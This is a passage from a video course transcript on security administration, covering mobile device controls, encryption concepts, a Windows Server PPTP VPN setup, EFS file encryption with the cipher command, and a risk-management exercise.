Configuration Manager, SCCM. Now, this integrates with Microsoft Intune, which
is designed for mobile device management. So from a central management pane,
we can deploy policies that lockdown mobile devices. And we can also control
which apps get installed on the devices and so on.
Another aspect of mobile device access control are captive portals. Now this isn't
really specific to mobile devices but it's a web page that a user needs to interact
with prior to getting on the Internet. And I'm sure you've seen this if you have
connected to a public Wi-Fi hotspot, such as in a coffee shop. You might have to
know a password before you're allowed out to the Internet and we're not talking
about the Wi-Fi network connection password. We're talking about after you're on
the Wi-Fi network and you fire up a web browser. You might have to specify
credentials or you might only have to agree to acceptable use settings on that
network and then proceed before you get a connection to the Internet.
That is a captive portal. So it may or may not require credentials. The other thing to
consider what mobile devices are PKI certificates. These are security certificates
that can be issued to user's devices or software. So we might have devices like
smartphones authenticate to a VPN only if the smartphone has a unique identifier, a
PKI certificate that is trusted by the VPN configuration. That way, even if the user
is issued a different phone, if the device certificate doesn't go along with it or if a
new valid one isn't issued, the user will not be able to get on to the VPN. So it's an
additional layer of security. We should also consider network isolation for mobile
devices.
So for example, if we're going to allow bring your own device, BYOD, where
employees can use their own personal smartphones, let's say. We might want to
make sure when they're at work that they're on an isolated network as opposed to
being connected directly to a network with sensitive data. We can also enable MAC
address whitelisting prior to allowing access to the network. Whether it's done at
the wireless network level or whether it's done through a wired switch that supports
802.1X authentication. Now, this isn't specific to mobile devices. The same thing
could be done for servers and desktops and any type of device, including IoT
devices, they all have a MAC address.
This is a unique 48-bit hexadecimal hardware address. However, it can easily be
spoofed with freely available tools, just like IP addresses can be spoofed. However,
that doesn't mean they shouldn't be a part of our security strategy, one of the layers
where we have multiple layers to enhance security. Also, this might not be scalable
for anonymous guest networks because you're always going to have new devices
connecting, you don't already know their MAC addresses ahead of time. So an
example of where MAC address whitelisting would not be suitable would be at a
car dealership where we have a waiting room for customers as their cars are being
repaired or as the paperwork is being drawn up for their purchase of a new vehicle.
Well, we always have different customers in and we don't know what the MAC
addresses are ahead of time. So MAC address whitelisting doesn't make sense. But
what would make sense in that aspect for those mobile devices is to have a guestisolated network that has no connectivity to the production network at that car
dealership. We can also configure a mobile device settings using our centralized
mobile device management tool. And that way, we don't have to run around and
configure these security settings one by one in every device. So if things like
turning off the microphone or the camera or maybe disabling GPS location services
on the device.
Enabling device encryption or remote wipe should the device be lost or stolen, and
we want to remove any sensitive data from it. We can also schedule malware
engine and definition updates, and again, that is not really specific to mobile
devices. Same thing would be applicable to servers, to desktops, to laptops, to
really any operating system, whether it be physical or virtual. Any type of device
should always have malware definition protection on it. However, what is
important is that we bear in mind that for smartphones, a lot of people don't really
think of them as computers and as such there might not be an anti-virus solution
installed on it. It's absolutely crucial because there is plenty of malware for
smartphones. Remember, there are more smartphone users around the world than
any other type of device, so certainly the bad guys are focusing on that.
So we can schedule malware scans. We can also restrict the ability of users to
install mobile device apps. Or we might have a very limited list of mobile device
apps that users are allowed to install, trusted business apps. We can also centrally
configure password and authentication settings to make it harder for malicious
users to crack into a stolen smartphone, for example. We should also have a way to
gather centralized inventory in terms of hardware. So the types of devices we have
and their details along with the software installed in all the devices. This way, at
any point in time, we might be able to detect any anomalies in terms of software
that is installed on devices that isn't licensed or might present a security risk to the
organization.
Data Confidentiality
[Video description begins] Topic title: Data Confidentiality. The presenter is Dan
Lachance. [Video description ends]
Data confidentiality has always been a big deal, and certainly it's one of the focal
points of cybersecurity. However, these days, where we have so many devices
interconnected over the Internet, data confidentiality is even more relevant than it
ever has been. So data confidentiality really means that we're going to protect
sensitive data through encryption. The original source data is called plain text.
After the data is encrypted or scrambled, it's called cipher text. Let's take a look at
the encryption process. So we start with plain text. In this example, it simply says
The quick brown fox. Let's assume that that is sensitive information that we want to
protect. So what we would then do is take that plain text and feed it into an
encryption algorithm with a key, which results in cipher text. In other words, the
encrypted data or the scrambled data.
Now, an encryption algorithm is really a mathematical function, and we'll talk
about keys. Keys can either be unique or not. And the key is part of what is used as
the mathematical code that is fed into the algorithm to result in that unique cipher
text. Of course, decryption happens in the opposite direction given that we have the
correct decryption key. Symmetric encryption is a type of encryption where only
one unique key is used. It gets called a secret key because there is only one, and it
can encrypt and it can also decrypt. So this secret key then has a couple of
problems, one of which is how can we securely distribute this secret key over a
network? Especially on large scale such as over the Internet. That is a problem.
Secondly, if the key is compromised, then all encrypted data encrypted by that key,
is then also compromised, it can be decrypted.
Talk about having all of your eggs in one basket. So symmetric encryption does
have its place when it's used in conjunction with asymmetric encryption.
Asymmetric encryption, as the name implies, uses two unique yet different, or
mathematically related in this case, keys, a public key and a private key. And when
we talk about asymmetric encryption, you'll also often hear it referred to as public
key encryption. Now, securely distributing the public key isn't a problem, that is
why it's called a public key. You can give it to anybody and there is no security
risk. But of course, the private key is private to the user device or software to which
it was issued, and it must be kept safe.
Often public and private keys are the result of issuing a PKI security certificate to
an entity. So the thing to bear in mind is that when we need to encrypt something
using asymmetric encryption, the target's public key is what is used to encrypt a
message. So if I'm sending an encrypted email message to you, I would need your
public key to encrypt the message for you. Now, the target's private key is what is
used to decrypt the message. So in our example to continue it, you would use your
mathematically related private key to decrypt the message that was encrypted with
your related public key.
[Video description begins] Encryption Technologies. [Video description ends]
Now, encryption can be applied to data at rest, data that is being stored on storage
media. Examples include things like Microsoft BitLocker which is built into some
Windows editions such as Windows 10 Enterprise. And it allows the encryption of
entire disk volumes. We've also got Microsoft Encrypting File System, EFS, which
is different than BitLocker because you can cherry pick the files and folders that
you want to encrypt. And it's tied to the user account where BitLocker is tied to the
machine. Depending on a cloud provider we might be using, like Microsoft Azure
or Amazon Web Services or Google Cloud and so on, we also have options for
server side encryption when we store our data in the cloud.
But we can also encrypt data as it's being transmitted over the network, and there
are many ways to do this, such as using a VPN, a virtual private network. This
allows a user that is working remotely to have an encrypted connection over the
Internet to a private network elsewhere, such as at work. Encrypting data using
Hypertext Transfer Protocol Secure, HTTPS, is everywhere, it's used all the time.
And in order for this to work, the web server needs to have been issued a PKI
security certificate. I'm not going to call it an SSL or TLS certificate, because SSL
and TLS are really methods of exchanging keys over a network. They're really not
tied to the certificate itself.
So I can use a PKI certificate on a web server that is configured for SSL, which
shouldn't be done because SSL is not secure and is deprecated. I could use the exact
same certificate, though, just as an example, on a different web server configured
for TLS. Now, as long as the server has the correct name or IP address that is in the
certificate, it would work fine. So the certificate is not tied to SSL or TLS. These
are protocol settings that are configured on the server as well as on the web browser
side of the connection.
Now, we can also secure data in transit when we are remotely administering
network devices like routers or switches or printers or Unix or Linux hosts, or even
Windows machines, if we install an SSH daemon on it. We can use Secure Shell to
do that, SSH. Secure Shell is an encrypted connection over a network that is
designed to do we just described, to perform remote administration at the command
line level.
Implement Encryption for Data in Motion
[Video description begins] Topic title: Implement Encryption for Data in Motion.
The presenter is Dan Lachance. [Video description ends]
We've talked about protecting data at rest and also protecting data in motion. Now
it's time to see how to actually do that. Specifically, protecting data in motion.
We're going to set up a very simple VPN environment here on Microsoft Windows
Server 2016. Which would allow users working remotely to establish an encrypted
VPN tunnel over the Internet. So that everything they send over the Internet to the
private network here at work is encrypted, it's protected. To get started here in
server 2016, I'm going to go to my Start menu, and I'm going to fire up the Server
Manager. Because I need to make sure the appropriate component or role services
are installed before I go and configure a VPN. So I'm going to click Add roles and
features,
[Video description begins] The Server Manager - Dashboard window is open. It is
divided into three parts. The first part includes four menus: Manage, Tools, View,
and Help. The second part includes Dashboard, Local Server, All Servers, and IIS
options. The Dashboard option is selected. The third part includes different
sections. The WELCOME TO SERVER MANAGER section includes a box. The box
is divided into two parts. The first part contains three options: QUICK START,
WHAT'S NEW, and LEARN MORE. The QUICK START option is selected and its
contents are displayed in the second part. It contains Configure this local server,
Add roles and features, Add other servers to manage, Create a server group, and
Connect this server to cloud services links. The ROLES AND SERVER GROUPS
section includes AD DS, DNS, and File and Storage Services tiles. [Video
description ends]
and I'll click Next on the first couple of screens,
[Video description begins] The Add Roles and Features Wizard opens. It is divided
into two parts. The first part contains Before You Begin, Installation Type, Server
Selection, Server Roles, Features, Confirmation, and Results options. The second
part displays the contents corresponding to the option in the first part. The wizard
also includes four buttons: Previous, Next, Install, and Cancel. The Before You
Begin option is selected. [Video description ends]
since I know I want to install something on the local server from where I'm running
this.
[Video description begins] He clicks the Next button and the Installation Type page
opens. He clicks the Next button and the Server Location page opens. He clicks the
Next button and the Server Roles page opens.The page includes Roles and
Description of the selected role. Roles includes Active Directory Certificate
Services, DHCP Server, File and Storage Services (3 of 12 installed), and Remote
Access checkboxes. [Video description ends]
And I'm interested here in the Remote Access side of things on the server, the
Remote Access role. I'm going to go ahead and turn that on.
[Video description begins] He selects the Remote Access checkbox and the
corresponding description displays. [Video description ends]
After a moment, it'll turn on the check mark. Over on the right I can see it's
describing that it allows things like DirectAccess, VPN, Web Application Proxy.
[Video description begins] He points to the description of the Remote Access
checkbox. [Video description ends]
So we want the VPN aspect, so I'm going to go ahead and click Next. I don't want
to be featured so I'll just proceed beyond this.
[Video description begins] The Select features page opens. It includes Features and
the Description of the selected feature. Features includes .NET Framework 3.5
Features (1 of 3 installed), .NET Framework 4.6 Features (4 of 7 installed),
BitLocker Drive Encryption, and Group Policy Management (Installed)
checkboxes. [Video description ends]
And as I'm proceeding here, I'm just going to click
[Video description begins] He clicks the Next button and the Remote Access page
opens. He clicks the Next button and the Select role services page opens. It includes
Role services and the Description of selected role service. Role services contains
three checkboxes: DirectAccess and VPN (RAS), Routing, and Web Application
Proxy. [Video description ends]
DirectAccess and VPN (RAS) because that is what I want. I'm going to add the
features for management tools
[Video description begins] The Add Roles and Features Wizard opens. It includes
Include management tools (if applicable) checkbox and Add Features and Cancel
buttons. [Video description ends]
and I will proceed again by clicking, Next and then finally, Install.
[Video description begins] He clicks the Add Features button and the Add Roles
and Features Wizard closes. [Video description ends]
And now it's the waiting game.
[Video description begins] He clicks the Next button and the Confirm installation
selections page opens. He clicks the Install button and the Installation progress
page opens. [Video description ends]
We wait for this to be installed before we can begin configuring our server side
VPN. Okay, before too long the installation will be completed. So I'm going to go
ahead and click Close.
[Video description begins] The Add Roles and Features Wizard closes. [Video
description ends]
Then here in the Server Manager tool, I'll go to the Tools menu so we can start
configuring this. I'm interested in the Remote Access Management tool. Now in
here, I can configure a VPN among other things like direct access or the web
application proxy, and so on.
[Video description begins] The Remote Access Management Console window
opens. It is divided into three parts. The first part is the navigation pane, which
includes the Configuration and Srv2016-1 options. The Configuration option
includes DirectAccess and VPN sub option. The second part is the content pane.
The third part is the Tasks pane, which includes the General option. It further
includes Manage a Remote Server and Refresh Installed Roles sub options. [Video
description ends]
I can also configure my VPN in the routing and remote access tool as well. So if I
were to let's say to minimize this and go back into Tools, I also have a Routing and
Remote Access tool. Now this is an older version that truly you might already be
familiar with if you've got experience with previous versions of the Windows
Server operating system. I'm going to go ahead and use this one.
[Video description begins] The Routing and Remote Access window opens. It is
divided into four parts. The first part is the menu bar. The second part is the
Toolbar. The third part contains the Routing and Remote Access root node, which
contains the Server Status and SRV2016-1 (local) options. The SRV2016-1 (local)
option is selected. The Welcome to Routing and Remote Access page is open in the
fourth part. [Video description ends]
So over on the left I can see my server name with a little red down-pointing arrow
because running on remote access has not yet been configured. And we are going to
configure a VPN here, so I'm going to right-click and choose Configure and Enable
Routing and Remote Access.
[Video description begins] The Routing and Remote Access Server Setup Wizard
opens. [Video description ends]
And I'll click Next in the wizard.
[Video description begins] The Configuration page opens. It contains five radio
buttons: Remote access (dial-up or VPN), Network address translation (NAT),
Virtual private network (VPN) access and NAT, Secure connection between two
private networks, and Custom configuration. [Video description ends]
Now, normally, you would have at least two network cards in your VPN host,
whether it's physical or virtual. One network card connected to a public-facing
network that is reachable from the Internet, that users would connect to to establish
the VPN tunnel. And the second card, and maybe more than just two cards, would
connect to internal networks to allow that connectivity. So here I've only got one
network card, so to proceed with this example, to configure the VPN, I'm going to
have to choose Custom configuration here in the wizard, instead of Remote access
(dial-up or VPN). So having done that, I'll click Next. I'm going to turn on VPN
access.
[Video description begins] The Custom Configuration page opens. It contains five
checkboxes: VPN access, Dial-up access, Demand-dial connections (used for
branch office routing), NAT, and LAN routing. [Video description ends]
I'll click Next, and Finish.
[Video description begins] The Completing the Routing and Remote Access Server
Setup Wizard page opens. [Video description ends]
Now what I've done at this point is configured a PPTP, or a Point to Point
Tunneling Protocol VPN.
[Video description begins] He clicks the finish button and the Routing and Remote
Access dialog box opens. It contains Start service and Cancel buttons. [Video
description ends]
There are many other types of VPNs, like SSL VPNs, which require a PKI
certificate. We could also have configured a layer two tunneling protocol VPN, and
so on. So here I am just going to click Start service to get this up and running.
[Video description begins] The Routing and Remote Access dialog box
closes. [Video description ends]
The only other thing I really should do is determine which IP addresses I want to
hand out to VPN clients.
[Video description begins] The Routing and Remote Access Server Setup Wizard
closes. [Video description ends]
So for that I am going to right-click on my server in the left-hand navigator and I
am going to go into Properties, IPv4.
[Video description begins] The SRV2016-1 (local) Properties dialog box opens. It
contains seven tabs: General, Security, IPv4, IPv6, IKEv2, PPP, and Logging. He
selects the IPv4 tab. It includes Enable IPv4 Forwarding checkbox, which is
selected. It also includes the IPv4 address assignment section, which further
includes Dynamic Host Configuration Protocol (DHCP) and Static address pool
radio buttons. This section also includes a table with five column headers: From,
To, Number, IP Addresses, and Mask and Add, Edit, and Remove buttons. The IPv4
tab also includes Enable broadcast name resolution checkbox and Adapter dropdown list box. Allow RAS to select adapter option is selected in the Adapter dropdown list box. [Video description ends]
And what I want to do is use a Static address pool for VPN clients, I'll click Add.
Let's say, I want to give them an address starting at 1.1.1.1
[Video description begins] He selects the Static address pool radio button and
clicks the Add button. The New IPv4 Address Range dialog box opens. It contains
Start IP address, End IP address, and Number of addresses fields and OK and
Cancel buttons. [Video description ends]
through to 1.1.1.50. That way I have a unique range that identifies VPN clients if I
happen to be taking a look on the network and seeing which devices are on the
network.
[Video description begins] He enters the values 1.1.1.1 and 1.1.1.50 in the Start IP
address and End IP address fields, respectively. The Number of addresses field
displays the value 50. [Video description ends]
I know these are VPN devices. So I'll click OK and OK.
[Video description begins] The New IPv4 Address Range dialog box closes. [Video
description ends]
The other thing to watch out for is to make sure that users that will
be authenticating to the VPN are allowed to do that.
[Video description begins] The SRV2016-1 (local) Properties dialog box
closes. [Video description ends]
So here in the Windows world I'm going to go back to my Start menu. I've got
Microsoft Active Directory configured, so I'm going to go ahead and start the
Active Directory Users and Computers tool. Because in here is one way that I can
enable remote access to make sure that users are allowed to establish a VPN
connection. So here I've got a user called User One.
[Video description begins] The Active Directory Users and Computers window
opens. It is divided into four parts. The first part is the menu bar. The second part
is the Toolbar. The third part contains the Active Directory Users and Computers
root node. It contains two nodes, Saved Queries and fakedomain1.local. The
fakedomain1.local is expanded and it includes Admins, Computers, and LasVegas
subnodes. The LasVegas subnode further contains Computers and Groups
subnodes and Users folder. A table with Name, Type, and Description column
headers and one row is displayed in the fourth part. The values User One and User
are displayed under the Name and Type column headers. [Video description ends]
So I'm just going to right-click and go over to the Properties for that account. And
what I'm really interested in here is the Dial-in tab.
[Video description begins] The User One Properties dialog box opens. It includes
General, Address, Account, and Profile tabs. The General tab is selected. It
includes First name, Initials, Last name, and Display name text boxes. [Video
description ends]
I want to make sure that Network Access Permission is allowed.
[Video description begins] He clicks the Dial-in tab. The Dial-in tab is divided into
four sections: Network Access Permission, Callback Options, Assign Static IP
Addresses, and Apply Static Routes. The Network Access Permission section
includes Allow access, Deny access, and Control access through NPS Network
Policy radio buttons. The Callback Options include No Callback, Set by Caller
(Routing and Remote Access Service only), and Always Callback to radio buttons
and a text box adjacent to the Always Callback to radio button. [Video description
ends]
Notice here it could be denied and we can also control it through a network policy.
As opposed to having to do it here within each individual user account, but at this
level, notice in fact, that access is allowed. I'm going to go ahead and click OK.
[Video description begins] The User One Properties dialog box closes. [Video
description ends]
Next, I'll configure the client's side of the VPN connection here on Windows 10.
Where the first thing I'll do is go to my Start menu and search up Settings. Now I'm
going to go on the Settings on my machine, then I'll go into Network & Internet.
[Video description begins] The Windows Settings window opens. It includes
Network & Internet, System, Devices, and Accounts options. [Video description
ends]
And I'm very interested in creating a new connection, so I'll start by clicking
Change adapter options.
[Video description begins] The Network & Internet page opens. It is divided into
two parts. The first part includes Home, Status, Wi-Fi, Ethernet, and VPN options
and a Find a settings search box. The second part displays the contents of the
corresponding option in the first part. The Status option is selected and its content
is displayed in the second part. It includes different sections. The Change your
network settings section contains three options: Change adapter options, Sharing
options, and Network troubleshooter. It also includes Network and Sharing Center
and Windows Firewall links. [Video description ends]
Here we can see any network adaptors that are configured on this machine.
[Video description begins] The Network Connections window opens. It includes
Bluetooth Network Connection, Ethernet, Ethernet 2, and Wi-Fi options. [Video
description ends]
Well when you configure a VPN, you're going to be end up configuring a new
adapter that shows up here, a logical adapter. So the next thing I'll do here on
Windows 10 is add a new network connection.
[Video description begins] He closes the Network Connections window. [Video
description ends]
So to do that I'm going to go to the Network and Sharing Center, and I'm going to
choose Set up a new connection or network.
[Video description begins] The Network and Sharing Center window opens. It is
divided into two parts. The first part includes Control Panel Home, Change
adapter settings, Media streaming options, Infrared, and Internet Options links.
The second part is divided into two sections. The first section is the View your
active networks and the second section is the Change your networking settings. The
Change your networking settings contains Set up a new connection or network and
Troubleshoot problems links. [Video description ends]
And this is going to be Connect to a workplace, click Next.
[Video description begins] The Set Up a Connection or Network window opens. It
includes four options: Connect to the Internet, Set up a new network, Manually
connect to a wireless network, and Connect to a workplace. It also includes Next
and Cancel buttons. [Video description ends]
I'm going to use my Internet connection, you need to be on the Internet to establish
a VPN link to the public interface of the VPN host.
[Video description begins] The Connect to a Workplace wizard opens. It includes
two options: Use my Internet connection (VPN) and Dial directly. It also includes
Cancel button. [Video description ends]
So now I have to specify the address or name that resolves to an IP address of that
host.
[Video description begins] He selects the Use my Internet connection (VPN)
option. The Type the Internet address to connect to page opens. It includes Internet
address and Destination name text boxes and Use a smart card, Remember my
credentials, and Allow other people to use this connection checkboxes. The
Destination name text box displays the value VPN Connection. The Remember my
credentials checkbox is selected. It also includes Create and Cancel
buttons. [Video description ends]
So I've popped in the IP address of that VPN server. I'm going to leave the
Destination name here just called VPN Connection.
[Video description begins] He enters the value 192.168.0.231 in the Internet
address text box. [Video description ends]
I'm not using a smart card for authentication although that is a great way to further
secure your environment.
[Video description begins] He unchecks the Remember my credentials
checkbox. [Video description ends]
And I certainly don't want to remember my credentials and I'll just click Create.
[Video description begins] The Type the Internet address to connect to page
closes. [Video description ends]
So if we were to go back and look at our adapters, we're going to see that we've
now got that virtual adapter I was talking about.
[Video description begins] He clicks the Change adapter settings link and the
Network Connections window opens again. [Video description ends]
It's called VPN Connection, because that is what we named it. And we're currently
disconnected, so we're going to go ahead and right-click and go into the Properties.
[Video description begins] He points to the VPN Connection option. [Video
description ends]
Because one of the things I want to do under Security is specify that we're using a
Point to Point Tunneling Protocol (PPTP), VPN. And then I'm going to right-click
and choose connect on that adapter.
[Video description begins] The VPN Connection Properties dialog box opens. It
contains five tabs: General, Options, Security, Networking, and Sharing. He clicks
the Security tab and it includes Type of VPN and Data encryption drop-down list
boxes. He clicks the Type of VPN drop-down list and selects the Point to Point
Tunneling Protocol (PPTP) option. He clicks the OK button and the VPN
Connection Properties dialog box closes. [Video description ends]
And I'm going to select the VPN Connection and choose Connect.
[Video description begins] He right-clicks the VPN Connection option in the
Network Connections window and a panel appears, which includes Npcap
Loopback Adapter, VPN Connection, and ARRIS-17BB-Basement options. [Video
description ends]
So at this point it's asking me for credentials, so I'm going to go ahead and specify
let's say user one's name and password.
[Video description begins] The Sign in dialog box opens. It contains User name
and Password text boxes and OK and Cancel buttons. [Video description ends]
And once I've done that we can see that we now have a valid connection.
[Video description begins] He enters the value Uone in the User name text
box. [Video description ends]
Well, if I just take a look here at the status when I right-click on it, we could see
that we've got some information being transmitted through this VPN connection.
[Video description begins] He points to the VPN Connection option. [Video
description ends]
And from a Command Prompt, if I were to type ipconfig, we would see that we've
got our VPN connection listed here.
[Video description begins] He right-clicks the VPN Connection option and clicks
the Status option. The VPN Connection Status dialog box opens. It contains two
tabs, General and Details. The General tab is selected. It is divided into two
sections, Connection and Activity, which display information about the VPN
connection. [Video description ends]
Scroll up a little bit.
[Video description begins] He opens the Command Prompt window. It displays the
C:\Users\danla> prompt. [Video description ends]
Right here, VPN connection listed as another adapter with an IP address within the
space that we configured.
[Video description begins] He points to the PPP adapter VPN Connection and
1.1.1.2 IPv4 address in the command prompt window. [Video description ends]
Implement Encryption for Data at Rest
[Video description begins] Topic title: Implement Encryption for Data at Rest. The
presenter is Dan Lachance. [Video description ends]
In this demonstration, I'll implement encryption for data at rest. And I'll be using
Microsoft Encrypting File System, or EFS, to do it. EFS is a part of the Windows
operating system, but you won't find it in some editions of Windows client
operating systems, like Windows 10 Home. However, here on my Windows server,
I've got some sample files, and I want to encrypt one of them.
[Video description begins] The File Explorer window is open. It is divided into two
parts. The first part is the navigation pane and it includes Downloads and
Documents options and Logs and 2017_Patients folders. The second part contains
four files: PHI_Automation_Test.txt, PHI-YHZ-004-0456-007.xls, PHI-YHZ-0040456-008.xls, and PHI-YHZ-004-0456-009.xls. [Video description ends]
What I'm going to do is right-click on the file I want to encrypt and choose
Properties.
[Video description begins] He right-clicks the PHI-YHZ-004-0456-009.xls file, a
shortcut menu appears and he selects the Properties option. The PHI-YHZ-0040456-009.xls Properties dialog box opens. It contains five tabs: General,
Classification, Security, Details, and Previous Versions. The General tab is
selected and it displays information about the PHI-YHZ-004-0456-009.xls file,
which includes Type of file, Location, Size on disk, and Created. It also includes
two Attributes checkboxes, Read-only and Hidden. It also includes Advanced, OK,
Cancel, and Apply buttons. [Video description ends]
From here, I can go to the Advanced button, and in the Advanced Attributes down
at the bottom, I can choose to either compress or encrypt the file, not both.
[Video description begins] The Advanced Attributes dialog box opens. It is divided
in two sections, File attributes and Compress or Encrypt attributes and it includes
OK and Cancel buttons. The File attributes section contains two checkboxes, File
is ready for archiving and Allow this file to have contents indexed in addition to file
properties. Both the checkboxes are checked. The Compress or Encrypt attributes
section contains two checkboxes, Compress contents to save disk space and
Encrypt contents to secure data and Details button. [Video description ends]
I'm going to choose Encrypt contents to secure data, and I'll click OK twice.
[Video description begins] He clicks OK and the Advanced Attributes dialog box
closes. He again clicks OK and the PHI-YHZ-004-0456-009.xls Properties dialog
box closes. [Video description ends]
After a moment, we should be able to see that we've got a tiny golden padlock icon
on that file icon, which implies that the file is in fact encrypted. Now it's encrypted
and tied to the user that's currently logged in.
[Video description begins] He points to the PHI-YHZ-004-0456-009.xls file. [Video
description ends]
So I'm going to fire up the Start menu here on my machine, and I'm going to type
certmgr.msc. That will start the certificate manager Microsoft console built in to
Windows. Now when I do that, I can examine my certificates.
[Video description begins] The certmgr – [Certificates – Current User] window
opens. It is divided into three parts. The first part is the Toolbar. The second part
contains the Certificates – Current User root node, which includes Personal,
Enterprise Trust, Trusted People, and Other People nodes. The third part displays
the contents of the option selected in the second part. [Video description ends]
Now what does that have to do with EFS? Well, if you didn't already have a
certificate prior to encrypting your first file with EFS, the operating system will
make one for you. So it will be here under Personal>Certificates.
[Video description begins] He clicks the Certificates folder under the Personal
node and a table is displayed in the third part. The table includes Issued To, Issued
By, Expiration Date, Intended Purposes, and Friendly Name column headers and
two rows. The values Administrator, Administrator, 10/15/2116, File Recovery, and
<None> are displayed in the first row and values Administrator, Administrator,
11/12/2118, Encrypting File System, and <None> are displayed in the second row
under the Issued To, Issued By, Expiration Date, Intended Purposes, and Friendly
Name column headers, respectively. [Video description ends]
Now this is for the current user, as we can see. And notice that I've got an
encrypting file system, or EFS certificate here, issued to user Administrator, which
is who I'm currently logged in as. I can just pop that up by double-clicking if I want
to see any further details on any of these. What I'm interested in looking at here, is
looking at the validity date.
[Video description begins] He double-clicks the Administrator value in the second
row under the Issued To column header and the Certificate dialog box opens. It
contains three tabs: General, Details, and Certification Path. The General tab is
selected and it displays the Certificate Information. It also includes the Issuer
Statement button. [Video description ends]
The certificate has a lifetime after which it can no longer be used.
[Video description begins] He points to the information: Valid from 12/6/2018 to
11/12/2118. [Video description ends]
And in this case, it tells me I've got a private key that corresponds to the certificate
as well.
[Video description begins] He clicks the OK button and the Certificate dialog box
closes. [Video description ends]
Here in the Windows command line, we can also use the cipher executable program
to work with encrypted files related to EFS.
[Video description begins] He opens the Select Administrator: Command Prompt
window. It displays the C:\Data\Sample_Data_Files\PHI\2017_Patients>
prompt. [Video description ends]
So here, I've navigated to where those sample files are. And if I type dir, indeed, I
can see the files that we were working with.
[Video description begins] He executes the following command: dir. The output
includes the following file names: PHI-YHZ-004-0456-007.xls, PHI-YHZ-0040456-008.xls, and PHI-YHZ-004-0456-009.xls. [Video description ends]
And as a matter of fact, if I flip over to Windows Explorer, there is our encrypted
file. It's got a 009 towards the end of the file name.
[Video description begins] He switches to the File Explorer window and points to
the PHI-YHZ-004-0456-009.xls file. [Video description ends]
So let's go back to the Command Prompt, and indeed, we do see the 009 file, but
we don't know if it's encrypted or not, not using dir we don't.
[Video description begins] He points to the PHI-YHZ-004-0456-009.xls file in the
output. [Video description ends]
So we can figure that out easily using the cipher command.
[Video description begins] He executes the following command:cls. [Video
description ends]
Now, the great thing about knowing how to do things at the command line is that
you can automate this.
[Video description begins] He executes the following command: cipher. The output
lists four files and indicate whether they are encrypted or unencrypted. The file
PHI-YHZ-004-0456-009.xls is encrypted and filesPHI-YHZ-004-0456-007.xls,
PHI-YHZ-004-0456-008.xls and PHI_Automation_Test.txt are unencrypted. [Video
description ends]
What if you had to take a look at the encryption state of many different files across
many servers and different folders and, well, you could write a script pretty quickly
that would do that. Here when we look at the output of the cipher command, U
means unencrypted, E means encrypted. Indeed, we can see our 009 file in fact is
encrypted.
I could also decrypt it right here at the command line. So instead of doing it the
GUI and right-clicking and going into properties, I could also do cipher /d for
decrypt and in this case, I put in the file name of that entry. And after that, we
would be on our way. So I'm going to go ahead and specify the file name, in this
case, 009. Okay, so it says decrypting it, let's just clear the screen, let's run cipher
again.
[Video description begins] He executes the following command: cipher /dPHIYHZ-004-0456-009.xls. [Video description ends]
And yeah, we can now see that it's got a U in front of it because now it's not
encrypted, it's unencrypted.
[Video description begins] He executes the following command: cipher and in the
output, he points to the PHI-YHZ-004-0456-009.xls file which is encrypted. [Video
description ends]
Now let's go back into the GUI for a minute in Windows Explorer because let's say,
I right-click on the folder containing those sample files and go into Properties, go
into Advanced. Well, I've already flagged encryption at the folder level.
[Video description begins] He right-clicks the 2017_Patients folder in the first part
of the File Explorer window. A shortcut menu appears. He selects the Properties
option and the 2017_Patients Properties dialog box opens. It includes General,
Sharing, and Security tabs. Under the General tab, he clicks the Advanced button
and the Advanced Attributes dialog box opens. It contains two sections, Archive
and Index attributes and Compress or Encrypt attributes and OK and Cancel
buttons. The Archive and Index attributes section contains two checkboxes, Folder
is ready for archiving and Allow files in this folder to have contents indexed in
addition to file properties. Both the checkboxes are checked. The Compress or
Encrypt attributes section contains two checkboxes, Compress contents to save disk
space and Encrypt contents to secure data and Details button. The Encrypt
contents to secure data checkbox is checked. [Video description ends]
Now when you do that initially, it'll ask you if you want to encrypt what is already
in the folder. But in the future, newly added files should be encrypted
automatically. Let's see if that is true.
[Video description begins] He clicks the Cancel button and the Advanced Attributes
dialog box closes. He clicks the Cancel button and the 2017_Patients Properties
dialog box closes. [Video description ends]
I'm going to right-click here in this folder and create a new file called new. And I
can tell already, it's encrypted, we can see the little gold padlock icon.
[Video description begins] He right-clicks and a menu appears. He hovers over the
New option and a flyout menu appears. He clicks the Text Document option from
the flyout menu and a text box appears. He names it new. [Video description ends]
And of course, we could verify this at the command line by simply typing, cipher.
And indeed, our new encrypted file is listed.
[Video description begins] He switches to the Administrator: Command Prompt
window and executes the following command: cipher. In the output, he points to the
new.txt file which is encrypted. [Video description ends]
Exercise: Session Management and Encryption
[Video description begins] Topic title: Exercise: Session Management and
Encryption. The presenter is Dan Lachance. [Video description ends]
In this exercise, you will first describe three common risk treatments related to risk
management, and provide an example of each. After that, you'll describe HTTP
session management. Next, you'll explain how encrypting files on many servers
using Microsoft Encrypting File System, or EFS, can be automated. Finally, the last
thing you'll do is explain the relationship between PKI certificates and SSL/TLS.
Pause the video, think about these things carefully, and then come back to view the
solutions.
In risk management there are a number of different risk treatments, ways to manage
that risk. One of which is risk mitigation. Risk mitigation would apply when you
implement a security control to either reduce, or eliminate, the risk. Such as putting
a firewall in place to reduce the risk of incoming malicious traffic initiated from
outside the network. Risk avoidance is another risk treatment. What this means is
that we do not partake in a specific activity because the risk is too high compared to
the possible rewards. So we completely avoid it in the first place.
Risk transfer means you are outsourcing the risk to a third-party, and one way that
happens is through insurance, such as through cyber liability insurance. For
example if you deal with customer data and that data is hacked and people's
sensitive information is then used for identity theft and so on. You could pay a
monthly premium and transfer that type of risk to a cyber liability insurance
company.
[Video description begins] HTTP Session Management. [Video description ends]
HTTP is generally a stateless protocol. Certainly that is true with HTTP 1.0. After
the web browser sends an HTTP command to the server and the server fulfills it
that is it. Session is done. Next time that same browser does it to the server looks
like a whole new connection from the servers' perspective unless using HTTP 2.
So HTTP is HyperText Transfer Protocol, we know that version 1 is considered
stateless. And so to deal with that we know that we have things like web browser
cookies to retain information between connections from the browser to the server.
And that cookie might contain sensitive information like a session ID or some kind
of a security token that authorizes the user to use a secured website.
[Video description begins] Communication stops upon HTTP transaction
completion. [Video description ends]
So the cookie data then, like a session ID, could be transmitted to web servers or
future connections without the user having to authenticate if the session hasn't yet
timed out. How can we automate EFS file encryption? We can use the GUI and
right-click on files and folders and go into the properties to enable encryption. But
otherwise, we could automate this by building a script. And that script, among
other things, would use the cipher.exe command that is built into Windows OS's
that support EFS.
Now the Cipher command by itself will simply list files and directories in the file
system in the current location. Preceded by either a U if the entry is unencrypted or
E if it's encrypted. And to encrypt something, we want to do that in our script, we
